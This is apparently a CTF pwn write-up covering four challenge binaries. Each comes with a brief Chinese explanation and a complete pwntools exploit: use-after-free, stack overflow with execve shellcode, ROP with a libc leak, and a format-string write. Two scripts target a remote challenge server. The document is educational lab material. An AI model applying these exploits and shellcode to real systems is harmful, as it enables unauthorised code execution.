PWN
0x01 babyheap
文件下载 babyheap
将程序导入 IDA 分析,发现存在 UAF(释放后使用)漏洞,只需把函数指针覆盖为 system 即可;另外用 F12 能在程序中找到字符串 "/bin/sh",因此可以直接把它作为参数传给 system 函数,拿到 shell。
附上exploit.py
# babyheap: session setup plus the helper for menu option 1 (pwntools script,
# written for Python 2 str semantics).
from pwn import *

context.log_level = "debug"  # log every byte sent and received

sh = process("./babyheap")  # runs the challenge binary locally
elf = ELF("babyheap")  # parsed so later code can look up elf.plt entries


def add(s):
    """Create a new entry through menu option 1.

    The size sent to the program is always len(s), and s is written with
    send(), so no trailing newline is appended to the content.
    """
    size_field = str(len(s))
    sh.recvuntil("Your choice: ")
    sh.sendline("1")
    sh.recvuntil("Please input size:")
    sh.sendline(size_field)
    sh.recvuntil("Please input content:")
    sh.send(s)
def delete(index):
    """Remove an entry through menu option 2.

    index is passed straight to sendline(), so callers supply it as a string.
    """
    for prompt, reply in (
        ("Your choice: ", "2"),
        ("Please input list index: ", index),
    ):
        sh.recvuntil(prompt)
        sh.sendline(reply)
def show(index):
    """Display an entry through menu option 3; index is sent as a string."""
    for prompt, reply in (
        ("Your choice: ", "3"),
        ("Please input list index:", index),
    ):
        sh.recvuntil(prompt)
        sh.sendline(reply)


# Two 32-byte entries are created and then both deleted. The write-up
# attributes the bug to a use-after-free: index 0 is still accepted by show()
# after delete("0").
filler = 'a'*32
add(filler)
add(filler)
delete("0")
delete("1")

# A 16-byte entry made of two 8-byte values.
# NOTE(review): presumably this allocation reuses a freed record whose layout
# is (data pointer, function pointer), and 0x602010 is the "/bin/sh" string the
# write-up mentions - confirm against the binary.
# The root cause sits in the target: a delete path that clears the list slot
# (or marks it unused) would make the stale index unreachable.
fake_record = p64(0x0000000000602010)+p64(elf.plt['system'])
add(fake_record)

# Using the stale index 0 is what invokes the overwritten pointer.
show("0")
sh.interactive()
0x02 AnotherRepeater
文件下载 AnotherRepeater
附上exploit.py
# AnotherRepeater: stack overflow that returns into the input buffer
# (pwntools script, written for Python 2 str semantics).
from pwn import *

context.log_level = "debug"

sh = remote("140.82.19.20",37621)
#sh = process("./AnotherRepeater")
elf = ELF("AnotherRepeater")

# The length prompt is answered with -1.
# NOTE(review): presumably the program compares the length as a signed value
# and later uses it as unsigned, so the bound check passes - confirm in the
# binary. Rejecting negative lengths before the read closes this path.
sh.recvuntil("Be careful. How many chars you want to reapeat?")
sh.sendline("-1")
sh.recv()

# The program prints 8 hex digits that the script treats as the buffer's
# stack address; this leak is what makes the return target predictable.
stack_addr = int(sh.recv(8),16)

# 23 bytes of 32-bit Linux execve("/bin//sh") shellcode (int 0x80, eax = 0x0b).
shellcode = "\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"

# Shellcode sits at the start of the buffer, padded with 'a' up to offset 1055,
# followed by the leaked address as a 32-bit value.
# NOTE(review): offset 1055 is presumably the distance to the saved return
# address; the approach only works with an executable stack and no canary, so
# NX and stack protectors are the relevant hardening here.
offset = 1055
payload = shellcode.ljust(offset,'a') + p32(stack_addr)

sh.sendline(payload)
sh.interactive()
0x03 babystack
文件下载 babystack
附上exploit.py
# babystack: two-round return-oriented chain with a stack pivot
# (pwntools script, Python 2 - note the print statement).
from pwn import *
from time import *

context.log_level = "debug"

sh = process("./babystack")
elf = ELF("babystack")

# Fixed code addresses inside the binary, so it is evidently not
# position-independent.
pop_rdi_ret = 0x0000000000400ad3
pop_rsi_r15_ret = 0x0000000000400ad1  # defined but not used below
leave_ret = 0x0000000000400a18


def _read_buffer_addr():
    """Answer the size prompt with 224 and return the address the program prints.

    224 equals the length of each payload sent below: 208 padded bytes plus
    two 8-byte values.
    """
    sh.recv()
    sleep(3)
    sh.recvuntil(">")
    sh.sendline("224")
    sh.recvuntil("Your message will be saved at 0x")
    return int(sh.recv(12),16)


def _frame(chain, buf_addr):
    """Pad chain to 208 bytes, then append buf_addr and the leave/ret address.

    NOTE(review): presumably offset 208 is the saved frame pointer and 216 the
    return address, so leave/ret moves the stack pointer onto the buffer; the
    first 8 'a' bytes of each chain would then be consumed as the popped rbp -
    confirm against the binary.
    """
    return chain.ljust(208,'a') + p64(buf_addr) + p64(leave_ret)


# Round 1: print the resolved __libc_start_main GOT entry through puts(), then
# continue at 0x400800.
# NOTE(review): 0x400800 is presumably an entry point that restarts the prompt.
stack_addr = _read_buffer_addr()
print stack_addr
leak_chain = 'a'*8 + p64(pop_rdi_ret) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts'])
leak_chain += p64(0x0000000000400800)
sh.send(_frame(leak_chain, stack_addr))

# Everything up to and including "bye~\n" is dropped; the next 6 bytes are
# zero-extended to a 64-bit pointer.
sh.recvuntil("bye~\n",True)
libc_addr = u64(sh.recv(6)+"\x00\x00")
log.success("__libc_start_main value = " + hex(libc_addr))

# Round 2: the buffer address is read again, then one call is made with both
# the argument and the target computed relative to the leaked pointer.
# NOTE(review): 0x1923ea and 0x2d990+0x1B are offsets from __libc_start_main
# that hold for one specific libc build only; presumably they resolve to a
# "/bin/sh" string and to system - confirm against the libc in use.
stack_addr = _read_buffer_addr()
call_chain = 'a'*8 + p64(pop_rdi_ret) + p64(libc_addr+0x1923ea) + p64(libc_addr+0x2d990+0x1B)
sh.send(_frame(call_chain, stack_addr))
sh.interactive()
0x04 OneRepeater
文件下载 OneRepeater
附上exploit.py
# OneRepeater: format-string write in two 16-bit halves
# (pwntools script, written for Python 2 str semantics).
from pwn import *

context.log_level = "debug"

sh = remote("140.82.19.20",36427)
#sh = process("./OneRepeater")
elf = ELF("OneRepeater")

menu_tail = "3) Exit\n"

# Option 1 makes the program print 8 hex digits, which the script logs at the
# end as buf_addr, i.e. it treats them as the input buffer's address.
sh.recvuntil("What you want to do?\n1) Input someing exciting to repeat!\n2) repeating!!!\n3) Exit\n")
sh.sendline("1")
data = int(sh.recv(8),16)

# Both writes are aimed at data+0x40C+0x10 and the two bytes after it.
# NOTE(review): presumably this is the saved return address, and the value
# written is the buffer address plus 0x100, where the shellcode is placed
# below - confirm against the binary.
target_slot = data+0x40C+0x4*4
low_pad = (data % 0x10000)+0x100-5
high_pad = (data >> 16) - 5

# First input: the target address followed by a padded %d and %16$hn, which
# stores the number of characters printed so far as a 16-bit value.
# NOTE(review): argument 16 presumably lands on the 4 address bytes at the
# start of the input.
payload = p32(target_slot) +"%." +str(low_pad) +"d%16$hn"
sh.sendline(payload)
sh.recvuntil(menu_tail)
sh.sendline("2")  # option 2 repeats the stored input
sh.sendline("1")
sh.recvuntil(menu_tail)

# Second input: the same construction for the upper half, padded to 0x100
# bytes and followed by 23 bytes of 32-bit Linux execve("/bin//sh") shellcode.
# NOTE(review): the underlying defect is presumably that option 2 passes the
# stored input as the format argument; printing it through a fixed "%s" format
# removes the write, and a non-executable stack blocks the shellcode.
payload = p32(target_slot+2) +"%." +str(high_pad) +"d%16$hn"
payload = payload.ljust(0x100,"a") + "\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
sh.sendline(payload)
sh.sendline("2")
sh.recvuntil("Exit\n")

# Option 3 exits the menu loop, so the function returns through the modified
# slot.
sh.sendline("3")
log.success("buf_addr = "+hex(data))
sh.interactive()